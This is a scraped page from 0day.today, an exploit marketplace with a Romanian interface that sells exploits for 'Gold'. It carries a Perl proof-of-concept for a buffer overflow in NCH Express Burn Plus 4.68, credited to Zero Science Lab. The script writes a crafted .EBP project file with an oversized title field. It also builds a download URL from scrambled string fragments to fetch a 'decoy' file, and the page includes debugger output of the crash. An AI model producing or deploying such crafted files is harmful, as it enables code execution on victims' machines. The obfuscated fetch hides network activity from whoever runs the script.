0day.today - Ce-a mai mare baze de date de exploit-uri din lume.
![](/img/logo_green.jpg)
Folosim un singur domeniu DOMAIN_LINK
Dacă dorești să cumperi un exploit sau să platești pentru un serviciu, trebuie să cumperi Gold. Nu dormim să folosim site-ul pentru scopuri informatice negative (hacking), prin urmare orice tip de acțiune de hacking care poate afecta ilegal alți utilizatori sau pagini web la care nu ești proprietar va fi pedepsită cu blocarea contului permanentă incluzand distrugerea datelor tale care aparțin de cont.
Administrația acestui website folosește adresele oficiale de contact. Atenție la impostori!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Citiți [ acordul ]
- Citiți [ trimite ] reguli
- Vizitați [ Întrebări frecvente. ] pagină
- [ Înregistrare ] profil
- Obține [ GOLD ]
- Dacă dorești să [ vinzi ]
- Dacă dorești să [ cumperi ]
- Dacă ați pierdut [ cont-ul vizitați această pagină. ]
- Orice întrebări [ [email protected] ]
- Pagină de autorizare
- Pagină de Înregistrare
- Pagină de restaurare a unui cont
- Pagina FAQ
- Pagina de contact
- Regulamentul pentru post-uri
- Pagina de acorduri
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ne puteți contacta prin:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NCH Software Express Burn Plus 4.68 Buffer Overflow
#!/usr/local/bin/perl # # # NCH Software Express Burn Plus 4.68 EBP Project File Handling Buffer Overflow PoC # # # Vendor: NCH Software # Product web page: http://www.nchsoftware.com # Affected version: 4.68 # # Summary: Express Burn is a program that allows you to create and copy many # kinds of disc media, including Audio (audio CDs / .mp3 CDs), Video (DVDs), # and Data (CDs / DVDs / Blu-ray). # # Desc: The vulnerability is caused due to a boundary error in the processing # of a project file, which can be exploited to cause a unicode buffer overflow # when a user opens e.g. a specially crafted .EBP file. Successful exploitation # could allow execution of arbitrary code on the affected machine. # # # =========================================================================== # # (1144.1488): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\NCH Software\ExpressBurn\expressburn.exe # eax=03418568 ebx=004034ec ecx=00000041 edx=00011a98 esi=03429428 edi=001893df # eip=004679ef esp=00185f18 ebp=00187254 iopl=0 nv up ei pl nz na pe nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 # expressburn+0x679ef: # 004679ef 66890c02 mov word ptr [edx+eax],cx ds:002b:0342a000=???? # 0:000> d eax # 03418568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 03418578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 03418588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 03418598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 034185a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 034185b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 034185c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 034185d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # # =========================================================================== # # # Tested on: Microsoft Windows 7 Professional SP1 EN # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Zero Science Lab - http://www.zeroscience.mk # # # Advisory ID: ZSL-2014-5166 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5166.php # # # 20.01.2014 # use Cwd; use LWP::Simple; print "\n #=---===---===---===---===---===---===---===---=# | | | Proof Of Concept script for | | | | NCH Software Express Burn Plus v4.68 | | | | | | ID: ZSL-2014-5166 | | | | --- | | | | Copyleft (c) 2014 | | | | Zero Science Lab - http://www.zeroscience.mk | | | #=---===---===---===---===---===---===---===---=# \n"; $file = "Exploit2.EBP"; $zoom = substr(")aZh4/",3,1).substr("^7ttr",2,2).substr("p>eErZ",0,1). substr("7U:/.9",2,2).substr("v/!+T",1,1).substr("oL4z55",3,1). substr("erY3%",0,2).substr("8oscW1",1,3).substr("iLien@",2,3). substr("*hJ2ce",4,2).substr("6.#h1A",1,1).substr("mk-((",0,2). substr(">/cZo",1,2).substr("[Mood]4",3,2).substr("lesS?",1,2). substr("a*\@J/b",4,2).substr("lue8X",0,3).substr("fish6",0,4). substr(",,8Y.b",4,1).substr("GrUmp!",3,2).substr("1337:",2,1); print "\n\n\x20\x20\x1A Creating malicious project file...\n\n"; $decoy = "440Hz.mp3"; getstore($zoom, $decoy); print "\x20\x20\x1A Throwing decoy file: $decoy...\n"; $buffer = "\x41\x41\x41\x41" x (15000/2); $dir = getcwd; $dir =~ s/\//\\/g; $load = "<?xml version=\"1.0\"?>\<ExpressBurnProject type=\"0\"><Alb". "umTitle/><TrackList><Audiotrack file=\"$dir\\$decoy\" title". "=\"$buffer\" artist=\"Salvador\"/></TrackList>\r</ExpressBu". "rnProject>\r"; open fp, ">./$file" || die "\n[-] Can't open $file: $!\n\n"; print fp $load; close fp; print "\n\x20\x20\x19 File created successfully: $file "; $file = -s $file; print "($file bytes)\n\n\n"; # 0day.today [2024-07-15] #